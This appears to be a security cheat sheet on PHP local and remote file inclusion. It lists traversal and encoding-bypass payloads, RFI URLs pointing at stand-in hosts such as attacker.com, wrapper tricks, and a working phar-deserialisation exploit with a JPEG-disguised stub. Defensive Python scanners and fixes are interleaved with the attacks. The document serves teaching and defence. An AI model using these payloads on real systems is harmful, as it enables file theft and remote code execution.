File Inclusion
A vulnerability in which user input controls which file the server loads, allowing attackers to access private resources.
Local File Inclusion (LFI)
The server loads a local file.
Basic LFI and bypasses
http://domain.com/index.php?page=../../../etc/passwd
URL encoding
One can try URL-encoding the path once or several times (double encoding).
http://domain.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://domain.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
Filter bypasses
http://domain.com/index.php?page=....//....//etc/passwd
http://domain.com/index.php?page=..///////..////..//////etc/passwd
http://domain.com/index.php?page=PhP://filter
Remote File Inclusion (RFI)
The server loads a file hosted on another server. RFI is only possible if allow_url_include is turned on.
Basic RFI and bypasses
http://domain.com/index.php?page=http://remote.com/shell.php
http://domain.com/index.php?page=\\remote.com\shell.php
http://domain.com/index.php?page=\\attacker.com\mal.php
PHP wrappers
php://filter
PHP stream filters transform data before the server reads it. Some of the techniques below can be used to bypass restrictions and filters set by the server.
# BASE64 encode data
http://domain.com/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
data://
http://domain.com/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://domain.com/?page=data://text/plain,<?php phpinfo(); ?>
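The patterns in the LFI, RFI and wrapper sections above are what a defender has to recognise in request logs and what the include handler has to refuse. The following is an added example, not code from the original notes: it percent-decodes a `page=` value until it stops changing (so `%252f` and `%c0%af` variants collapse to `../`), flags traversal, the `....//` strip-once bypass, null bytes, remote URLs, UNC paths and stream wrappers (including the case-variant `PhP://`), and then contrasts the naive filter with two fixes: resolving against a fixed directory and checking the result stays inside it, or mapping the parameter through an allowlist. The request lines, `PAGE_DIR` and `ALLOWED_PAGES` are constructed for the demo. Note that, like RFI, the `data://` wrapper also needs allow_url_include to be on.

```python
# Added example (not from the original notes): normalise ?page= values the way PHP's
# include would see them and flag the LFI/RFI/wrapper patterns listed above.
import posixpath
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed request lines, one per pattern from the notes above.
SAMPLE_REQUESTS = [
    "/index.php?page=about",
    "/index.php?page=../../../etc/passwd",
    "/index.php?page=..%252f..%252f..%252fetc%252fpasswd",
    "/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
    "/index.php?page=%252e%252e%252fetc%252fpasswd%00",
    "/index.php?page=....//....//etc/passwd",
    "/index.php?page=PhP://filter/convert.base64-encode/resource=index.php",
    "/index.php?page=http://remote.example/shell.php",
    "/index.php?page=\\\\remote.example\\shell.php",
    "/?page=data://text/plain,<?php phpinfo(); ?>",
]

PAGE_DIR = "/var/www/pages"                                       # hypothetical include directory
ALLOWED_PAGES = {"about": "about.php", "contact": "contact.php"}  # constructed allowlist
# Overlong UTF-8 encodings of '/', '.' and '\' that lax decoders accept.
OVERLONG = {b"\xc0\xaf": b"/", b"\xe0\x80\xaf": b"/", b"\xc0\xae": b".", b"\xc1\x9c": b"\\"}
WRAPPER_RE = re.compile(r"^([a-z][a-z0-9+.\-]*)://", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def page_param(request_line: str) -> str:
    """Pull the raw (still encoded) page= value out of a request line."""
    for pair in urlsplit(request_line).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "page":
            return value
    return ""

def normalise(raw: str, max_rounds: int = 5):
    """Percent-decode until the value stops changing (defeats %252f-style double
    encoding), map overlong UTF-8 to ASCII, and cut at a NUL byte as PHP
    versions before 5.3.4 did.  Returns (decoded value, nul_seen)."""
    data = raw.encode()
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for overlong, plain in OVERLONG.items():
        data = data.replace(overlong, plain)
    nul_seen = b"\x00" in data
    return data.split(b"\x00", 1)[0].decode("latin-1"), nul_seen

def classify(raw: str) -> list:
    """Return the list of findings for one raw page= value (empty if clean)."""
    value, nul_seen = normalise(raw)
    findings = []
    scheme = WRAPPER_RE.match(value)
    if scheme:
        name = scheme.group(1).lower()
        findings.append("remote-url" if name in ("http", "https", "ftp") else "wrapper:" + name)
    if value.startswith(("\\\\", "//")):
        findings.append("unc-path")
    if TRAVERSAL_RE.search(value):
        findings.append("traversal")
    elif TRAVERSAL_RE.search(value.replace("../", "")):
        # '....//' only turns into '../' after a filter strips '../' once
        findings.append("strip-once-bypass")
    if nul_seen:
        findings.append("null-byte")
    return findings

def scan(request_lines) -> dict:
    """Map each flagged raw page= value to its findings."""
    report = {}
    for line in request_lines:
        raw = page_param(line)
        findings = classify(raw)
        if findings:
            report[raw] = findings
    return report

def resolve_under(base: str, raw: str):
    """Resolve the decoded value against a fixed directory and accept it only if it
    stays inside.  Prefixing a directory also neutralises stream wrappers, which
    PHP honours only at the very start of a path."""
    value, _ = normalise(raw)
    target = posixpath.normpath(posixpath.join(base, value))
    return target if target == base or target.startswith(base + "/") else None

def allowlisted_page(raw: str):
    """Preferred fix: the parameter picks a key, never a path fragment."""
    name = ALLOWED_PAGES.get(raw)
    return posixpath.join(PAGE_DIR, name) if name else None

if __name__ == "__main__":
    for raw, findings in scan(SAMPLE_REQUESTS).items():
        print(f"{raw!r:70} -> {', '.join(findings)}")
```

`resolve_under` lets `....//....//etc/passwd` through as `/var/www/pages/..../..../etc/passwd`, which is inside the directory and points at nothing; the danger only appears when a filter first strips `../` once and hands the result to include, which is why `classify` reports that case separately as `strip-once-bypass`.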
phar:// and phar deserialisation
A .phar file is a PHP archive. One can upload such a file and have code executed when the server loads it.
The archive contains metadata in serialised form; when the server parses the archive, that metadata is deserialised.
Even if the server-side code never calls eval, any of the following file functions will still trigger the deserialisation when given a phar:// path:
file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), filesize()
Exploitation
Suppose this is the server's source code.
# server.php
<?php
class ReadFile {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }
    // Runs when the object is destroyed, i.e. right after it is unserialised
    function __destruct() {
        system($this->data);
    }
}
// Merely reading a phar:// path is enough to unserialise the archive metadata
file_get_contents("phar://pwned.phar");
?>
This is the code that builds the phar file.
# make_phar.php
<?php
class ReadFile {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }
    function __destruct() {
        system($this->data);
    }
}

# Make phar
$phar = new Phar('pwned.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

# Add object of class as metadata
$object = new ReadFile('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();
?>
The JPEG magic bytes \xff\xd8\xff are placed at the start of the stub so the phar file gets past file upload restrictions that check the file signature.
Build pwned.phar with:
php --define phar.readonly=0 make_phar.php
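Because the page's trick relies on the upload filter looking only at the leading bytes, a useful server-side check is to parse any uploaded file for a phar manifest regardless of its extension or magic bytes, and to refuse archives whose metadata carries a serialised object. The following is an added example, not code from the original notes: it locates the `__HALT_COMPILER();` token, reads the global manifest in the documented layout (manifest length, file count, API version, flags, alias, metadata), and flags both a stub that does not begin with a PHP tag and any `O:`/`C:` class record in the metadata. The `build_demo_phar` helper writes only the stub and global manifest header (no file entries or signature), which is enough for the scanner; the sample metadata is the serialisation the `ReadFile('whoami')` object from make_phar.php above would produce, constructed here by hand. Note that on PHP 8.0 and later, accessing a phar:// path no longer unserialises the metadata automatically (only Phar::getMetadata() does), so the trigger functions listed above apply to PHP 7.x and earlier.

```python
# Added example (not from the original notes): scan an upload for a phar manifest
# and flag serialised objects in its global metadata.
import re
import struct

# The stub must end with this token; PHP allows an optional ' ?>' and line ending after it.
HALT_RE = re.compile(rb"__HALT_COMPILER\(\);(?: \?>)?(?:\r\n|\n)?")
# O:<len>:"Class" is a serialised object, C:<len>:"Class" a custom-serialised one.
OBJECT_RE = re.compile(rb'[OC]:\d+:"([^"]+)"')

def build_demo_phar(stub: bytes, metadata: bytes, alias: bytes = b"") -> bytes:
    """Stub + global manifest (manifest length, file count, API version, flags,
    alias length, alias, metadata length, metadata); header only, no entries."""
    stub = stub.rstrip(b"\r\n") + b"\r\n"            # terminate the stub unambiguously
    body = struct.pack("<IHI", 1, 0x1100, 0)         # 1 file, API 1.1.0, no flags
    body += struct.pack("<I", len(alias)) + alias
    body += struct.pack("<I", len(metadata)) + metadata
    return stub + struct.pack("<I", len(body)) + body

def parse_phar_header(blob: bytes):
    """Return the stub and global manifest fields, or None if no manifest follows
    a __HALT_COMPILER(); token."""
    halt = HALT_RE.search(blob)
    if halt is None:
        return None
    off = halt.end()
    try:
        _, nfiles, api, flags, alias_len = struct.unpack_from("<IIHII", blob, off)
        off += 18
        alias = blob[off:off + alias_len]
        off += alias_len
        (meta_len,) = struct.unpack_from("<I", blob, off)
        off += 4
    except struct.error:
        return None
    return {"stub": blob[:halt.start()], "files": nfiles, "api": api,
            "flags": flags, "alias": alias, "metadata": blob[off:off + meta_len]}

def assess(blob: bytes) -> dict:
    """Classify an upload: is it a phar, and does it carry risky metadata?"""
    header = parse_phar_header(blob)
    if header is None:
        return {"is_phar": False, "findings": []}
    findings = []
    # A stub that does not open with a PHP tag is a polyglot (e.g. JPEG magic first).
    if not header["stub"].lstrip().startswith((b"<?php", b"#!")):
        findings.append("polyglot-stub")
    classes = OBJECT_RE.findall(header["metadata"])
    if classes:
        findings.append("object-metadata:" + ",".join(c.decode("latin-1") for c in classes))
    return {"is_phar": True, "files": header["files"], "findings": findings}

# Constructed samples: the stub and metadata make_phar.php above would produce
# for ReadFile('whoami') (a public property serialises under its bare name), and
# a benign archive whose metadata is a plain array.
DEMO_METADATA = b'O:8:"ReadFile":1:{s:4:"data";s:6:"whoami";}'
DEMO_PHAR = build_demo_phar(b"\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>", DEMO_METADATA)
CLEAN_PHAR = build_demo_phar(b"<?php __HALT_COMPILER(); ?>\n", b'a:1:{s:7:"version";s:3:"1.0";}')

if __name__ == "__main__":
    samples = (("uploaded.jpg", DEMO_PHAR), ("tool.phar", CLEAN_PHAR), ("photo.jpg", b"\xff\xd8\xff\xe0JFIF"))
    for name, blob in samples:
        print(name, assess(blob))
```

A scanner like this belongs next to, not instead of, the configuration fix: if the application never needs phar:// at all, unregistering the wrapper with `stream_wrapper_unregister('phar')` removes the trigger entirely.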